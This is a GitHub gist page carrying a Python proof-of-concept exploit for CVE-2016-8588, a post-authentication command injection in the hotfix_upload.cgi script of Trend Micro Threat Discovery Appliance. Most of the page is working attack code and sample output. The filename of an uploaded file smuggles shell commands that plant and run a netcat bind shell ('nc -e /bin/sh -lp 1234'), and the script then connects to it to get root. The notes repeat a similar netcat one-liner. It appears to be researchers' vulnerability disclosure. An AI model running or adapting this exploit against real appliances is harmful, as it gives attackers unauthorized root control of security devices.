CVE-2016-8588 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 hotfix_upload.cgi Command Injection Remote Code Execution Vulnerability
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/local/bin/python | |
| """ | |
| Trend Micro Threat Discovery Appliance <= 2.6.1062r1 hotfix_upload.cgi Remote Code Execution Vulnerability | |
| Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/ | |
| File: TDA_InstallationCD.2.6.1062r1.en_US.iso | |
| sha1: 8da4604c92a944ba8f7744641bce932df008f9f9 | |
| Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1 | |
| Summary: | |
| ======== | |
| There exists a post authenticated upload vulnerability that can be used to execute arbitrary code. | |
| Notes: | |
| ====== | |
| - Since this is a busybox, getting a connectback seemed hard. So, for this particular PoC, all I did was | |
| take command, upload bd, exec, read, rinse, repeat. | |
| - You maybe can get a binded netcat using '`nc -e /bin/sh -lp 1337`' but this at times broke the cgi and the rest of the | |
| log_query_system.cgi was unstable. | |
| - Auth is bypassed, see the other case... | |
| Example: | |
| ======== | |
| saturn:trend_micro_threat_discovery_hotfix_upload_rce mr_me$ ./poc.py | |
| (+) usage: ./poc.py <target> <pass> | |
| (+) eg: ./poc.py 172.16.175.123 admin123 | |
| saturn:trend_micro_threat_discovery_hotfix_upload_rce mr_me$ ./poc.py 172.16.175.123 admin | |
| (+) logged in... | |
| (+) executing bd... | |
| (+) sleeping for a sec... | |
| (+) calling backdoor! | |
| id | |
| uid=0(root) gid=0(root) | |
| uname -a | |
| Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown | |
| pwd | |
| /opt/TrendMicro/MinorityReport/www/cgi-bin | |
| ls pwn | |
| pwn | |
| cat pwn | |
| nc -e /bin/sh -lp 1234 | |
| """ | |
| import re | |
| import os | |
| import sys | |
| import time | |
| import requests | |
| import threading | |
| requests.packages.urllib3.disable_warnings() | |
| if len(sys.argv)!= 3: | |
| print "(+) usage: %s <target> <pass>" % sys.argv[0] | |
| print "(+) eg: %s 172.16.175.123 admin123" % sys.argv[0] | |
| sys.exit(-1) | |
| t = sys.argv[1] | |
| p = sys.argv[2] | |
| bu = "https://%s/" % t | |
| l_url = "%scgi-bin/logon.cgi" % bu | |
| u_url = "%scgi-bin/hotfix_upload.cgi?sID=" % bu # you need the sid thingy | |
| s = requests.Session() | |
| def pwn(s): | |
| """ | |
| This 'upload' will trigger the command 3 times... so if you exit the shell, | |
| you can come back another 2 times... | |
| """ | |
| # sorry k0rpr1t_z0mb1e, this requires no oob request | |
| kungfu = "si;S=`echo $PATH|cut -c1`;echo 'nc -e '$S'bin'$S'sh -lp 1234'>pwn;chmod 755 pwn;.`echo $S`pwn" | |
| u = { | |
| 'ajaxuploader_file': (kungfu, 'hax', 'text/plain'), | |
| } | |
| r = s.post(u_url, files=u, verify=False) | |
| # first we login... | |
| r = s.post(l_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False) | |
| if "frame.cgi" in r.text: | |
| print "(+) logged in..." | |
| print "(+) executing bd..." | |
| ut = threading.Thread(target=pwn, args=(s,)) | |
| ut.daemon = True | |
| ut.start() | |
| print "(+) sleeping for a sec..." | |
| time.sleep(1) | |
| print "(+) calling backdoor!" | |
| os.system("nc %s 1234" % t) | |
| else: | |
| print "(-) login failed" | |
| sys.exit(-1) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment